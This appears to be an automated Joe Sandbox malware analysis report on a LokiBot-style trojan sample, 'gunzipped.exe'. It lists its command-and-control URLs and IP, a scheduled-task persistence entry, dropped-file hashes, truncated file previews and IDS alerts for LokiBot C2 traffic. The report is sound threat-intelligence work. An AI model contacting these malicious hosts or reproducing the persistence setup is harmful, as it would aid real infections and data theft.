                C:\Users\user\AppData\Roaming\WiHDtnb.exe18%ReversingLabs
                C:\Users\user\AppData\Roaming\WiHDtnb.exe34%VirustotalBrowse
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php100%URL Reputationmalware
                http://kbfvzoboss.bid/alien/fre.php100%URL Reputationmalware
                http://alphastand.win/alien/fre.php100%URL Reputationmalware
                http://alphastand.trade/alien/fre.php100%URL Reputationmalware
                http://alphastand.top/alien/fre.php100%URL Reputationmalware
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://136.244.109.75/index.php/comments/feed/0%VirustotalBrowse
                http://136.244.109.75/index.php/feed/0%VirustotalBrowse
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://136.244.109.75/index.php/1748937true
                  unknown
                  http://kbfvzoboss.bid/alien/fre.phptrue
                  • URL Reputation: malware
                  • URL Reputation: malware
                  unknown
                  http://alphastand.win/alien/fre.phptrue
                  • URL Reputation: malware
                  unknown
                  http://alphastand.trade/alien/fre.phptrue
                  • URL Reputation: malware
                  unknown
                  http://alphastand.top/alien/fre.phptrue
                  • URL Reputation: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://136.244.109.75/index.php/feed/gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://136.244.109.75/index.php/comments/feed/gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namegunzipped.exe, 00000000.00000002.1993945409.0000000002571000.00000004.00000800.00020000.00000000.sdmp, WiHDtnb.exe, 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.ibsensoftware.com/WiHDtnb.exe, WiHDtnb.exe, 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://136.244.109.75/index.php/wp-json/gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://gmpg.org/xfn/11gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://api.w.org/gunzipped.exe, 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          136.244.109.75
                          unknownUnited States
                          20473AS-CHOOPAUStrue
                          Joe Sandbox version:40.0.0 Tourmaline
                          Analysis ID:1427123
                          Start date and time:2024-04-17 03:16:05 +02:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 7m 13s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:15
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:gunzipped.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@18/13@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 98%
                          • Number of executed functions: 70
                          • Number of non-executed functions: 19
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                          • Not all processes where analyzed, report is missing behavior information
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtCreateKey calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          TimeTypeDescription
                          03:16:47API Interceptor79x Sleep call for process: gunzipped.exe modified
                          03:16:48API Interceptor11x Sleep call for process: powershell.exe modified
                          03:16:49Task SchedulerRun new task: WiHDtnb path: C:\Users\user\AppData\Roaming\WiHDtnb.exe
                          03:16:50API Interceptor1x Sleep call for process: WiHDtnb.exe modified
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          136.244.109.75SCTR11670000pdf.exeGet hashmaliciousLokibotBrowse
                          • 136.244.109.75/index.php/690877741063
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          AS-CHOOPAUSSCTR11670000pdf.exeGet hashmaliciousLokibotBrowse
                          • 136.244.109.75
                          xM6280MQQPyf.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                          • 45.32.168.59
                          https://rts.ccmp.eu/rts/go2.aspx?h=1247107&tp=i-1NGB-Fb-EeO-1jnRvw-1c-PwWY-1c-1j0tsE-l8HoOHKMRi-iIE2M&x=readymoves.com.au/media/Imfs/%23Y2hlcnlsQGltZnMuY29tLmF1Get hashmaliciousUnknownBrowse
                          • 45.77.236.187
                          http://169.150.221.147Get hashmaliciousUnknownBrowse
                          • 136.244.92.75
                          http://scorelineupdate.comGet hashmaliciousUnknownBrowse
                          • 95.179.200.239
                          la.bot.arm.elfGet hashmaliciousUnknownBrowse
                          • 45.32.106.211
                          W1w2WUui2Q.elfGet hashmaliciousMiraiBrowse
                          • 155.138.246.0
                          https://rolexz.b-cdn.net/Wi0n0MntyEr00170887/index.htmlGet hashmaliciousUnknownBrowse
                          • 136.244.92.75
                          xggP3BzhZDQC.exeGet hashmaliciousXWormBrowse
                          • 45.32.168.59
                          SecuriteInfo.com.Linux.Siggen.9999.15399.29417.elfGet hashmaliciousMiraiBrowse
                          • 204.80.130.53
                          No context
                          No context
                          Process:C:\Users\user\AppData\Roaming\WiHDtnb.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1415
                          Entropy (8bit):5.352427679901606
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                          MD5:97AD91F1C1F572C945DA12233082171D
                          SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                          SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                          SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                          Process:C:\Users\user\Desktop\gunzipped.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1415
                          Entropy (8bit):5.352427679901606
                          Encrypted:false
                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                          MD5:97AD91F1C1F572C945DA12233082171D
                          SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                          SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                          SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                          Malicious:false
                          Reputation:moderate, very likely benign file
                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):2232
                          Entropy (8bit):5.379828835936797
                          Encrypted:false
                          SSDEEP:48:tWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZM0N1Ryus:tLHxvCsIfA2KRHmOugroPs
                          MD5:D83AFE19E5D73A16F6E64349291CFDE7
                          SHA1:F00A166D5E19F565A79DA8AAF60BFAD6424FB119
                          SHA-256:E0617D49B7E5704732939767B06CFB7B75FE4AF5EBC37B0197E3D1555BCFDE86
                          SHA-512:D4F8309DFCBA02300ADE00D3ECADC351AA6060B8727909757DF0616B6615091FD09B23DA0EE6CD422E2DCDE30A89A0B098A6D0D457B82210EF04332BD17BA41A
                          Malicious:false
                          Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Users\user\Desktop\gunzipped.exe
                          File Type:XML 1.0 document, ASCII text
                          Category:dropped
                          Size (bytes):1580
                          Entropy (8bit):5.09742565722186
                          Encrypted:false
                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtixvn:cgergYrFdOFzOzN33ODOiDdKrsuTmv
                          MD5:510F1589129C1F420D0A3370D577A0B5
                          SHA1:5A2C71387F6BD3829FDD94BE87AEF9835C43ED36
                          SHA-256:2FBD1AEC3EF82833C6A496AD492206DDA97BF5DEC21B111299E4874878D759E3
                          SHA-512:5E1CBB6AF36620F91797BA8128CE84144ADAFC1686003E986B10B36DC9E9F7A08A1218DC0F3A7AD62A87C9BA238F05A614BF8162C6208AA6B3B527FAB3E6FBB2
                          Malicious:true
                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                          Process:C:\Users\user\AppData\Roaming\WiHDtnb.exe
                          File Type:XML 1.0 document, ASCII text
                          Category:dropped
                          Size (bytes):1580
                          Entropy (8bit):5.09742565722186
                          Encrypted:false
                          SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtixvn:cgergYrFdOFzOzN33ODOiDdKrsuTmv
                          MD5:510F1589129C1F420D0A3370D577A0B5
                          SHA1:5A2C71387F6BD3829FDD94BE87AEF9835C43ED36
                          SHA-256:2FBD1AEC3EF82833C6A496AD492206DDA97BF5DEC21B111299E4874878D759E3
                          SHA-512:5E1CBB6AF36620F91797BA8128CE84144ADAFC1686003E986B10B36DC9E9F7A08A1218DC0F3A7AD62A87C9BA238F05A614BF8162C6208AA6B3B527FAB3E6FBB2
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                          Process:C:\Users\user\Desktop\gunzipped.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Preview:1
                          Process:C:\Users\user\Desktop\gunzipped.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):47
                          Entropy (8bit):1.168829563685559
                          Encrypted:false
                          SSDEEP:3:/lSll2DQi:AoMi
                          MD5:DAB633BEBCCE13575989DCFA4E2203D6
                          SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                          SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                          SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                          Malicious:false
                          Preview:........................................user.
                          Process:C:\Users\user\Desktop\gunzipped.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):553984
                          Entropy (8bit):7.87347866079058
                          Encrypted:false
                          SSDEEP:12288:/AogULNdQcE6lIi6TckYyD1WoO3wjcuuC4KU3f3uWbF:JgadQ1iYcSWNwjHuC4KU3f3uWbF
                          MD5:8864B52D242037414B7C4A230C390AB8
                          SHA1:47680D0F0D286097F7CDDA37947AAAACD7226EE3
                          SHA-256:D405284F75CDE4B8C45E3D5C3B41C7BBD6DB2C75788CB6D0B1DEEC5EA60559A4
                          SHA-512:1CC6124F479DEE45A46ADA9416E90642365F316B055E2DBB73CC34B0276449FABF1B7929E5A76C133829FECA47669445CBCE2B876430D5D77902C2034B64B59D
                          Malicious:true
                          Antivirus:
                          • Antivirus: Joe Sandbox ML, Detection: 100%
                          • Antivirus: ReversingLabs, Detection: 18%
                          • Antivirus: Virustotal, Detection: 34%, Browse
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f.................Z...........x... ........@.. ....................................@..................................x..S.................................................................................... ............... ..H............text....X... ...Z.................. ..`.rsrc................\..............@..@.reloc...............r..............@..B.................x......H.......D...T............................................................0..A....... R........%.m...(.....n... .........%.i...(.....j...(+...*.....&*...B... ....(......*....0..............,.".".#..(....+...*..0...............".".#. ....(....+...*...0...............".".#...(....+...*..0...................... ....(....+...*..0..+.....................(Q...+....s....}......j}....*..0............{......*...0..........~j........E....Z.......Z...E...Z...?...?.....{.....(i...~n... ..
                          Process:C:\Users\user\Desktop\gunzipped.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):26
                          Entropy (8bit):3.95006375643621
                          Encrypted:false
                          SSDEEP:3:ggPYV:rPYV
                          MD5:187F488E27DB4AF347237FE461A079AD
                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                          Malicious:false
                          Preview:[ZoneTransfer]....ZoneId=0
                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Entropy (8bit):7.87347866079058
                          TrID:
                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                          • Win32 Executable (generic) a (10002005/4) 49.78%
                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                          • Generic Win/DOS Executable (2004/3) 0.01%
                          File name:gunzipped.exe
                          File size:553'984 bytes
                          MD5:8864b52d242037414b7c4a230c390ab8
                          SHA1:47680d0f0d286097f7cdda37947aaaacd7226ee3
                          SHA256:d405284f75cde4b8c45e3d5c3b41c7bbd6db2c75788cb6d0b1deec5ea60559a4
                          SHA512:1cc6124f479dee45a46ada9416e90642365f316b055e2dbb73cc34b0276449fabf1b7929e5a76c133829feca47669445cbce2b876430d5d77902c2034b64b59d
                          SSDEEP:12288:/AogULNdQcE6lIi6TckYyD1WoO3wjcuuC4KU3f3uWbF:JgadQ1iYcSWNwjHuC4KU3f3uWbF
                          TLSH:70C4120C9BAD5826D0DC0B7C9172509C8336E2E2F947F75A6EA088DB0E13781D59D2EB
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\..f.................Z...........x... ........@.. ....................................@................................
                          Icon Hash:9931c5b98687b385
                          Entrypoint:0x4878ee
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x661F0E5C [Tue Apr 16 23:48:44 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          add byte ptr [eax], al
                          NameVirtual AddressVirtual Size Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IMPORT0x878980x53.text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x880000x1600.rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x8a0000xc.reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x20000x858f40x85a0005cadf0d2a0e99577d063964d1c3f4d4False0.9272282799345183data7.886814119771072IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc0x880000x16000x160056be764d9db1562197361a976f89e128False0.7361505681818182data6.561881678021146IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc0x8a0000xc0x2009ab695e151690702fbce31521ff5710fFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountryZLIB Complexity
                          RT_ICON0x880c80xf5dPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9125349605898805
                          RT_GROUP_ICON0x890380x14data1.05
                          RT_VERSION0x8905c0x404data0.4280155642023346
                          DLLImport
                          mscoree.dll_CorExeMain
                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                          04/17/24-03:18:07.152097TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976280192.168.2.5136.244.109.75
                          04/17/24-03:18:07.152097TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976280192.168.2.5136.244.109.75
